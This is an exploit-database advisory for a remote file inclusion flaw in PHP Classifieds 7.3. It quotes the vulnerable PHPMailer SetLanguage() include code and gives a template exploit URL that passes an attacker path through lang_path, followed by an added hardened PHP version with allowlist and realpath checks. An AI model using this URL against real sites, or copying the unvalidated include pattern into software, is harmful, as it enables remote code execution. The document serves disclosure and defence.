PHP Classifieds 7.3 - Remote File Inclusion



EKU-ID: 21264
CVE: CVE-2010-4914; OSVDB-76202
Author: alsa7r
Published: 2010-09-04
Verified: Not Verified


==================================
  PHP Classifieds v7.3 RFI Vulnerability
==================================

====================================================
[x] ExpL0it TitLe : PHP Classifieds v7.3 RFI Vulnerability
[x] DatE          : 09 September 2010
[x] AutH0r        : alsa7r
[x] Contact       : TBT9@hotmail.com
[x] TestEd 0n     : windows 7
[x] d0rK          : :P
====================================================

==========================================================================================
[x]bug heRe:
 function SetLanguage($lang_type, $lang_path = "tools/phpmailer/language/") {
        // $lang_path and $lang_type are concatenated into the include() path without validation
        //echo $lang_path.'phpmailer.lang-'.$lang_type.'.php';
        if(file_exists($lang_path.'phpmailer.lang-'.$lang_type.'.php'))
            include($lang_path.'phpmailer.lang-'.$lang_type.'.php');
        else if(file_exists($lang_path.'phpmailer.lang-en.php'))
            include($lang_path.'phpmailer.lang-en.php');
        // the final else branch is cut off in this excerpt
    }
==========================================================================================

==================================================================
[x]expL0iT:
http://[site]/classifieds/tools/phpmailer/class.phpmailer.php?lang_path=[EV!L]
==================================================================
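
A hardened counterpart to the SetLanguage() excerpt above, as an added example that is not part of the original advisory and is not PHP Classifieds or PHPMailer code. The function name resolve_language_file(), the temporary demo directory and its files are constructed for illustration; the language directory is assumed to come from application configuration, never from request data.

```php
<?php
// Added example: resolve a language code to a file inside a fixed directory.
// All names here are hypothetical; this is not the project's own code.

// Returns the canonical path of the language file, or null if none is safe to load.
function resolve_language_file(string $langType, string $langDir): ?string
{
    $base = realpath($langDir);   // false for URLs and for missing directories
    if ($base === false || !is_dir($base)) {
        return null;
    }
    // Allow only short locale tokens such as "en", "fr", "pt_br":
    // no dots, slashes, schemes or NUL bytes can reach the file name.
    if (!preg_match('/\A[a-z]{2,3}(?:[_-][a-z]{2,4})?\z/i', $langType)) {
        $langType = 'en';
    }
    // Same fallback order as the original: requested language, then English.
    foreach (array_unique([strtolower($langType), 'en']) as $code) {
        $path = realpath($base . DIRECTORY_SEPARATOR . "phpmailer.lang-$code.php");
        // Accept only a regular file whose canonical path is still under $base.
        if ($path !== false && is_file($path)
            && strpos($path, $base . DIRECTORY_SEPARATOR) === 0) {
            return $path;
        }
    }
    return null;
}

// Constructed demo data: a temporary language directory with two files.
$dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lang_demo_' . getmypid();
mkdir($dir);
file_put_contents("$dir/phpmailer.lang-en.php", "<?php // constructed\n");
file_put_contents("$dir/phpmailer.lang-fr.php", "<?php // constructed\n");

// Valid codes, a mixed-case code, a path-like value and a missing language.
foreach (['fr', 'FR', '../other', 'de'] as $lang) {
    $file = resolve_language_file($lang, $dir);
    printf("%-12s => %s\n", json_encode($lang), $file === null ? 'none' : basename($file));
}
// A directory value that is a URL never resolves to a local path.
var_dump(resolve_language_file('en', 'http://example.invalid/'));

// Clean up the constructed files.
array_map('unlink', glob("$dir/*.php"));
rmdir($dir);
```

The caller passes the returned path to include only when it is not null, so the include target is always a canonical local file under the configured language directory.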

============================================================================================
[x]th4nKs t0:
Mr.wolf , morabko , unit x team , sudan hacker team
============================================================================================

=====================
TBT9[at]hotmail[dot]com
=====================